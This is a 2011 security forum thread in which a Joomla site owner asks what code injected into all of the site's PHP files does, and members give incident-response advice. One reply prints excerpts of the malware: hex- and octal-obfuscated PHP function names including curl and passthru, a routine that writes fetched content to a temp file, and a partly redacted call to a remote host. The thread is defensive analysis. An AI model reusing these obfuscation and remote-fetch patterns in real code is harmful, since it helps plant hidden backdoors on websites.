.

HACK CODE TO BE EXPLANED

<<

alexsp

Newbie
Newbie

Posts: 5

Joined: Wed Jan 26, 2011 4:55 pm

Post Wed Jan 26, 2011 5:08 pm

HACK CODE TO BE EXPLANED

hello there to the ethical hacker community, at the start of the attached file there is code that i found to all .php files that exist on a site that was hacked. If the code seems interesting to anyone, some explanation on what the code does would be very helpful so i can secure my site.
<<

cd1zz

User avatar

Recruiters
Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Wed Jan 26, 2011 6:52 pm

Re: HACK CODE TO BE EXPLANED

This doesn't look malicious to me. Why do you think it is?
<<

alexsp

Newbie
Newbie

Posts: 5

Joined: Wed Jan 26, 2011 4:55 pm

Post Thu Jan 27, 2011 2:37 am

Re: HACK CODE TO BE EXPLANED

First of all thanks for the reply, i know this code is malicious because the site was hacked several times and many strange things happened, you know like frontpage replacement from hackers and thiings like that. Secondly because the site is built on joomla and i can distinguish (so can everyone who has been working with joomla) the code that exists on a normal joomla .php page from code that was manually inserted. You can also notice this, the joomla code starts with the joomla credits comments (at line 2!!!).
Can you tell what the first part of code (the one that is not well lined out well and is before the joomla credits comments) is for? Also if you can see it uses code encoding and decoding, i don't know, i can post also a normal index.php to view the difference
<<

alexsp

Newbie
Newbie

Posts: 5

Joined: Wed Jan 26, 2011 4:55 pm

Post Thu Jan 27, 2011 2:43 am

Re: HACK CODE TO BE EXPLANED

I forgot to mention that this code has been placed to all .php pages of the site, that is not very common don't you think? This is actually a professional real hack and i think it is very interesting to be investigated how  this was done...
<<

RoleReversal

User avatar

Hero Member
Hero Member

Posts: 928

Joined: Fri Jan 04, 2008 8:54 am

Location: UK

Post Thu Jan 27, 2011 4:43 am

Re: HACK CODE TO BE EXPLANED

Alexsp,

I've no experience with Joomla, so apologises if this is overly generic. If you can post what the file should be, or just outline which code is added/modified that will help.

However, whilst this may be a result of a compromise, I'd not expect the code you've found to be the first point of intrusion, as any attacker would already need a foothold on the server to be able to add/alter any of your existing source.

I'd strongly suggest a thorough review of server logs, access, user etc. (basically the usual candidates), as well as a security audit of the code hosted on the site.

Is this site the only web application running on the server, or is it shared? If shared, it could be that the fault doesn't existing within your application, but a weakness on a different site has allowed a malicious user to system access to modify source code of otherwise secure web apps.

Hope this helps.
<<

alexsp

Newbie
Newbie

Posts: 5

Joined: Wed Jan 26, 2011 4:55 pm

Post Thu Jan 27, 2011 5:48 am

Re: HACK CODE TO BE EXPLANED

I am posting an original ("clean") index.php file of joomla as it should normally be.
It is obvious that this part of code shouldn't be there, but even if someone claims that this code is not malicious it means that he or she understands what this code does. So please if you will explain to me too.
Andrew i know that is not the first point of intrusion, and i know also that joomla has a lot of known vulnerabilitites, but i see a piece of code on the files of a site and i am curious what this does and how.
<<

RoleReversal

User avatar

Hero Member
Hero Member

Posts: 928

Joined: Fri Jan 04, 2008 8:54 am

Location: UK

Post Thu Jan 27, 2011 6:02 am

Re: HACK CODE TO BE EXPLANED

Again, not a Joomla expert so I'm going blind on some things, but:

'Edited' index file includes two additional php files (helper.php & toolbar.php). Are these a legitimate part of the framework? Are they also edited? Are they required? What do they do?

looks like the edited file removes an authorisation call, suspicion levels rising...

Finally, the edited index file looks like to calls a function to get a gzipped copy of the configuration file.

From my knowledge of Joomla this could be legit (if you're seeing it across multiple systems, any chance you've just upgraded Joomla?). But at worst looks like a data leakage issue, I'd still suggest focusing on locating the original compromise, this looks to be more a symptom than a cause.

Can anyone shed any additional light?
<<

alexsp

Newbie
Newbie

Posts: 5

Joined: Wed Jan 26, 2011 4:55 pm

Post Thu Jan 27, 2011 6:56 am

Re: HACK CODE TO BE EXPLANED

I agree that is the symptom and not the cause. I would like to say again that this code has been inserted to all php pages, the number of those is very large.
As for the files you mentioned Andrew helper.php and the other one, yes these files are very common to joomla.
So only someone that would understand what the code does per line could help right now.
I am not sure but the first big part looks like a shell to me. 
<<

RoleReversal

User avatar

Hero Member
Hero Member

Posts: 928

Joined: Fri Jan 04, 2008 8:54 am

Location: UK

Post Thu Jan 27, 2011 7:26 am

Re: HACK CODE TO BE EXPLANED

alexsp wrote:I am not sure but the first big part looks like a shell to me. 


which part? Unless I'm missing something I can't see anything in the code you've uploaded that indicates a shell.
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1661

Joined: Mon Jan 29, 2007 2:59 pm

Post Thu Jan 27, 2011 10:09 am

Re: HACK CODE TO BE EXPLANED

While, unfortunately, I don't have time to review code, today...

My inking, first, would be to setup a LAN sniffer and a test workstation, open the php from the test workstation, trace it, and see what happens...
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

n1p

Jr. Member
Jr. Member

Posts: 89

Joined: Tue Mar 16, 2010 5:31 pm

Post Thu Jan 27, 2011 10:53 am

Re: HACK CODE TO BE EXPLANED

Initial inspection - the initial arguments are set to globals for each function which are extrememly obfuscated:
  Code:
$x1e="\x63u\162\x6c\x5f\x69\156i\x74";            //curl_init
$x1f="\143\165rl\137set\x6fp\x74";                 //curl_setopt
$x20="\x63\165r\154_\x65xe\x63";                   //defined              
$x23="\x66\143\154\x6f\163e";            
$x24="f\x69l\145\x5fg\x65t\x5f\143on\164\145nt\x73";  //file_get_contents
$x25="\146\x6f\160\145\x6e";   //fopen
$x26="f\x75n\x63\x74\x69\x6f\156\137\x65xi\163\x74\163";  // function_exists
$x27="\146\167\x72i\x74\145";   //fwrite
$x28="\x68\145a\144\145\x72";   //header
$x29="\x69\156\151_\147e\164";  //ini_get
$x2a="\x69s_f\151\x6ce";       //isfile
$x2b="\x6d\1445";         //md5
$x2c="\160a\163s\x74h\162u";    //passthru
$x2d="strpos";
$x2e="\x73t\162t\157l\157\167er";  //strtolower
$x2f="\165rl\145n\x63od\x65";   //urlencode


Also creates a file in my instance on local file system in Temp folder and writes to that file after making following request

  Code:
"http://getpro<removed>number.com/i/rem.php?u=http://yourhost/index.php%3FDBGSESSID%3D405705822416000001%3Bd&k=054bb441428d289666e5cc9692c5420d&t=jm"


In this instance k is the filename for temp created file...

  Code:
function x0e($x10,$x12){
   global $x1e,$x1f,$x20,$x21,$x22,$x23,$x24,$x25,$x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d,$x2e,$x2f;
   if ($x2a($x10)){         //if(is_file(local temp file))
   $x13=@$x25($x10,'w');    //then open it with w privs
   @$x27($x13,$x12);         //fwrite
   @$x23($x13);               //fclose
   @$x28('Y_Out: b2s=');     //header('Y_Out: b2s=');
   }
}


Alot of other code, there I haven't had a chance to look at. That remote site appears down, but is actually a forbidden index page... Suspicious?

Given more time I could have a look, but that may help you get started... PM if you want real URL as I didnt want possibly malicious URLs on posting....

Apologies if not too detailed, I could only look for 10 mins!

n1p
<<

cd1zz

User avatar

Recruiters
Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Thu Jan 27, 2011 11:38 am

Re: HACK CODE TO BE EXPLANED

n1p

Which file did that come from?
<<

n1p

Jr. Member
Jr. Member

Posts: 89

Joined: Tue Mar 16, 2010 5:31 pm

Post Thu Jan 27, 2011 12:13 pm

Re: HACK CODE TO BE EXPLANED

First one provided.. extracted the added code in main index.php and reformatted it..
<<

cd1zz

User avatar

Recruiters
Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Thu Jan 27, 2011 12:17 pm

Re: HACK CODE TO BE EXPLANED

I'm an idiot - I didn't have word wrap on. I'll take a look now.
<<

RoleReversal

User avatar

Hero Member
Hero Member

Posts: 928

Joined: Fri Jan 04, 2008 8:54 am

Location: UK

Post Thu Jan 27, 2011 4:46 pm

Re: HACK CODE TO BE EXPLANED

cd1zz wrote:I'm an idiot - I didn't have word wrap on. I'll take a look now.

+1, I did the same, nothing like a rookie error on a public board :'(
Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software